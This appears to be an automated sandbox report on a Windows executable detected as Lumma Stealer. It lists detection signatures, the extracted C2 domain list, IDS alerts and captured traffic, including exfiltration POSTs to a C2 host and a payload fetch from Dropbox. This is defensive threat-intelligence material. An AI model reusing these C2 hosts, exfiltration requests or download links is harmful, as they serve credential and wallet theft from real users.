Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SDIO_R773.exe

Overview

General Information

Sample name:SDIO_R773.exe
Analysis ID:1589146
MD5:c45a36ec4b4f8d8412c60db459c2b9d2
SHA1:5c67453947128df910b46d5356f2ac5a8bae0cc9
SHA256:24a26ac9cd209bf84831dae7d778fceb46b1e30b48454c130a6e62accdc1369e
Tags:exeuser-SquiblydooBlog
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates HTML files with .exe extension (expired dropper behavior)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SDIO_R773.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\SDIO_R773.exe" MD5: C45A36EC4B4F8D8412C60DB459C2B9D2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["truculengisau.biz", "nuttyshopr.biz", "spookycappy.biz", "fraggielek.biz", "punishzement.biz", "marketlumpe.biz", "littlenotii.biz", "grandiouseziu.biz"], "Build id": "BbL7Kk--02"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1985877415.0000000000D74000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0x50e20:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
        • 0x543b6:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        Process Memory Space: SDIO_R773.exe PID: 7528JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: SDIO_R773.exe PID: 7528JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: SDIO_R773.exe PID: 7528JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T11:56:11.578646+010020283713Unknown Traffic192.168.2.449733104.102.49.254443TCP
              2025-01-11T11:56:12.691095+010020283713Unknown Traffic192.168.2.449734104.21.64.1443TCP
              2025-01-11T11:56:13.296659+010020283713Unknown Traffic192.168.2.449735104.21.64.1443TCP
              2025-01-11T11:56:14.845942+010020283713Unknown Traffic192.168.2.449736104.21.64.1443TCP
              2025-01-11T11:56:27.599440+010020283713Unknown Traffic192.168.2.449743104.21.64.1443TCP
              2025-01-11T11:56:28.731351+010020283713Unknown Traffic192.168.2.449744104.21.64.1443TCP
              2025-01-11T11:56:30.316746+010020283713Unknown Traffic192.168.2.449745104.21.64.1443TCP
              2025-01-11T11:56:31.630210+010020283713Unknown Traffic192.168.2.449746104.21.64.1443TCP
              2025-01-11T11:56:34.056316+010020283713Unknown Traffic192.168.2.449747104.21.64.1443TCP
              2025-01-11T11:56:35.218542+010020283713Unknown Traffic192.168.2.449748162.125.66.18443TCP
              2025-01-11T11:56:36.746076+010020283713Unknown Traffic192.168.2.449749162.125.66.15443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T11:56:12.815363+010020546531A Network Trojan was detected192.168.2.449734104.21.64.1443TCP
              2025-01-11T11:56:13.795382+010020546531A Network Trojan was detected192.168.2.449735104.21.64.1443TCP
              2025-01-11T11:56:34.507897+010020546531A Network Trojan was detected192.168.2.449747104.21.64.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T11:56:12.815363+010020498361A Network Trojan was detected192.168.2.449734104.21.64.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T11:56:13.795382+010020498121A Network Trojan was detected192.168.2.449735104.21.64.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T11:56:28.095111+010020480941Malware Command and Control Activity Detected192.168.2.449743104.21.64.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T11:56:31.687606+010028438641A Network Trojan was detected192.168.2.449746104.21.64.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T11:56:12.096510+010028586661Domain Observed Used for C2 Detected192.168.2.449733104.102.49.254443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: nuttyshopr.bizAvira URL Cloud: Label: malware
              Source: spookycappy.bizAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/apiQAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com:443/apiAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/apiWAvira URL Cloud: Label: malware
              Source: fraggielek.bizAvira URL Cloud: Label: malware
              Source: littlenotii.bizAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/apiiAvira URL Cloud: Label: malware
              Found malware configuration
              Source: SDIO_R773.exe.7528.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["truculengisau.biz", "nuttyshopr.biz", "spookycappy.biz", "fraggielek.biz", "punishzement.biz", "marketlumpe.biz", "littlenotii.biz", "grandiouseziu.biz"], "Build id": "BbL7Kk--02"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.2% probability
              Source: SDIO_R773.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: SDIO_R773.exeStatic PE information: certificate valid
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49749 version: TLS 1.2
              Source: SDIO_R773.exe, 00000000.00000002.2063536939.0000000000739000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: NOTE: cannot open autorun.inf [error: %d]
              Source: SDIO_R773.exe, 00000000.00000002.2063536939.0000000000739000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: DEVMGR_SHOW_NONPRESENT_DEVICES\autorun.inf[NOT_A_VIRUS]openNOTE: cannot open autorun.inf [error: %d]
              Source: SDIO_R773.exe, 00000000.00000002.2063536939.0000000000739000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
              Source: SDIO_R773.exe, 00000000.00000002.2063536939.0000000000739000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: basic_string::_M_construct null not valid_LAN__WLAN-WiFi__WWAN-4G_indexes\SDIO/c del %ws\_*.bincmdautorun.inf.bat%s\%Sdriverstools\SDIOindexes\SDIO\_wgetcwd errorSrc: %d %S
              Source: SDIO_R773.exe, 00000000.00000002.2063536939.0000000000739000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -expertmode -checkupdates -nosnapshot -nologfile -showconsole -showdrpnames1 -showdrpnames2 sdio.cfg\autorun.inf[autorun]
              Source: SDIO_R773.exe, 00000000.00000002.2063536939.0000000000739000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -expertmode -checkupdates -nosnapshot -nologfile -showconsole -showdrpnames1 -showdrpnames2 sdio.cfg\autorun.inf[autorun]
              Source: SDIO_R773.exe, 00000000.00000002.2063536939.0000000000739000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: autorun.infSDIO_auto.bat MB KBSelect Additional Path
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NOTE: cannot open autorun.inf [error: %d]
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DEVMGR_SHOW_NONPRESENT_DEVICES\autorun.inf[NOT_A_VIRUS]openNOTE: cannot open autorun.inf [error: %d]
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basic_string::_M_construct null not valid_LAN__WLAN-WiFi__WWAN-4G_indexes\SDIO/c del %ws\_*.bincmdautorun.inf.bat%s\%Sdriverstools\SDIOindexes\SDIO\_wgetcwd errorSrc: %d %S
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -expertmode -checkupdates -nosnapshot -nologfile -showconsole -showdrpnames1 -showdrpnames2 sdio.cfg\autorun.inf[autorun]
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -expertmode -checkupdates -nosnapshot -nologfile -showconsole -showdrpnames1 -showdrpnames2 sdio.cfg\autorun.inf[autorun]
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.infSDIO_auto.bat MB KBSelect Additional Path
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Include autorun.inf and SDIO_auto.bat
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: STR_VIRUS_AUTORUN = "There is an AUTORUN.INF file in the root folder"
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: STR_VIRUS_AUTORUN_H = "There is an AUTORUN.INF file which can be used by malicious software to infect your PC. It's advised to check it for viruses or inspect the file to make sure it can be trusted.\n\nIf you're sure it's clean, add [NOT_A_VIRUS] inside to hide this warning."
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: STR_USBWIZ_PAGE4_INCAUTO = "Include autorun.inf and SDIO_auto.bat"
              Source: SDIO_R773.exe, 00000000.00000002.2064219074.0000000000875000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: Include autorun.inf and SDIO_auto.bat
              Source: SDIO_R773.exe, 00000000.00000002.2064219074.0000000000875000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: STR_VIRUS_AUTORUN = "There is an AUTORUN.INF file in the root folder"
              Source: SDIO_R773.exe, 00000000.00000002.2064219074.0000000000875000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: STR_VIRUS_AUTORUN_H = "There is an AUTORUN.INF file which can be used by malicious software to infect your PC. It's advised to check it for viruses or inspect the file to make sure it can be trusted.\n\nIf you're sure it's clean, add [NOT_A_VIRUS] inside to hide this warning."
              Source: SDIO_R773.exe, 00000000.00000002.2064219074.0000000000875000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: STR_USBWIZ_PAGE4_INCAUTO = "Include autorun.inf and SDIO_auto.bat"
              Source: SDIO_R773.exeBinary or memory string: NOTE: cannot open autorun.inf [error: %d]
              Source: SDIO_R773.exeBinary or memory string: DEVMGR_SHOW_NONPRESENT_DEVICES\autorun.inf[NOT_A_VIRUS]openNOTE: cannot open autorun.inf [error: %d]
              Source: SDIO_R773.exeBinary or memory string: autorun.inf
              Source: SDIO_R773.exeBinary or memory string: basic_string::_M_construct null not valid_LAN__WLAN-WiFi__WWAN-4G_indexes\SDIO/c del %ws\_*.bincmdautorun.inf.bat%s\%Sdriverstools\SDIOindexes\SDIO\_wgetcwd errorSrc: %d %S
              Source: SDIO_R773.exeBinary or memory string: -expertmode -checkupdates -nosnapshot -nologfile -showconsole -showdrpnames1 -showdrpnames2 sdio.cfg\autorun.inf[autorun]
              Source: SDIO_R773.exeBinary or memory string: -expertmode -checkupdates -nosnapshot -nologfile -showconsole -showdrpnames1 -showdrpnames2 sdio.cfg\autorun.inf[autorun]
              Source: SDIO_R773.exeBinary or memory string: autorun.infSDIO_auto.bat MB KBSelect Additional Path
              Source: SDIO_R773.exeBinary or memory string: Include autorun.inf and SDIO_auto.bat
              Source: SDIO_R773.exeBinary or memory string: STR_VIRUS_AUTORUN = "There is an AUTORUN.INF file in the root folder"
              Source: SDIO_R773.exeBinary or memory string: STR_VIRUS_AUTORUN_H = "There is an AUTORUN.INF file which can be used by malicious software to infect your PC. It's advised to check it for viruses or inspect the file to make sure it can be trusted.\n\nIf you're sure it's clean, add [NOT_A_VIRUS] inside to hide this warning."
              Source: SDIO_R773.exeBinary or memory string: STR_USBWIZ_PAGE4_INCAUTO = "Include autorun.inf and SDIO_auto.bat"

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49733 -> 104.102.49.254:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49735 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49743 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49746 -> 104.21.64.1:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: truculengisau.biz
              Source: Malware configuration extractorURLs: nuttyshopr.biz
              Source: Malware configuration extractorURLs: spookycappy.biz
              Source: Malware configuration extractorURLs: fraggielek.biz
              Source: Malware configuration extractorURLs: punishzement.biz
              Source: Malware configuration extractorURLs: marketlumpe.biz
              Source: Malware configuration extractorURLs: littlenotii.biz
              Source: Malware configuration extractorURLs: grandiouseziu.biz
              Creates HTML files with .exe extension (expired dropper behavior)
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile created: NOUBJXTSUL2YOW34.exe.0.dr
              Source: Joe Sandbox ViewIP Address: 162.125.66.18 162.125.66.18
              Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
              Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
              Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.102.49.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 162.125.66.15:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 162.125.66.18:443
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 44Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K8TVJ8YTUGNJCookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18124Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TWFBAMJXUCookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8727Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IL6BMMWY71KX89XERCookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20428Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5NLKGQ3BJ2AK5Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1234Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=53G1TXEPG3U24Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 589917Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 79Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: GET /scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfjirjyzys&st=8tyyz5o7&dl=1 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: www.dropbox.com
              Source: global trafficHTTP traffic detected: GET /cd/0/get/Ch9Eke8i0BLC3-DtINknVGtnjncus_u99HdagMMMzqS1C8VzqEY5PQ_JhjusgWHY1s4INYrDYXnP6n3C2obINdgOZAzOWbQcf4GGcylpLcMkiO54nwiWjM6mWgFeR2Srg4dg3ZC_YHliUlRXW1veRWN7/file?dl=1# HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: GET /scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfjirjyzys&st=8tyyz5o7&dl=1 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: www.dropbox.com
              Source: global trafficHTTP traffic detected: GET /cd/0/get/Ch9Eke8i0BLC3-DtINknVGtnjncus_u99HdagMMMzqS1C8VzqEY5PQ_JhjusgWHY1s4INYrDYXnP6n3C2obINdgOZAzOWbQcf4GGcylpLcMkiO54nwiWjM6mWgFeR2Srg4dg3ZC_YHliUlRXW1veRWN7/file?dl=1# HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *Qdbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-ancestors 'self' https://*.dropbox.com ; base-uri 'self' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; font-src https://* data: ; img-src https://* data: blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 'nonce-SIs+rPrP3KYvK5g0EjVvZjT67gE=' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)
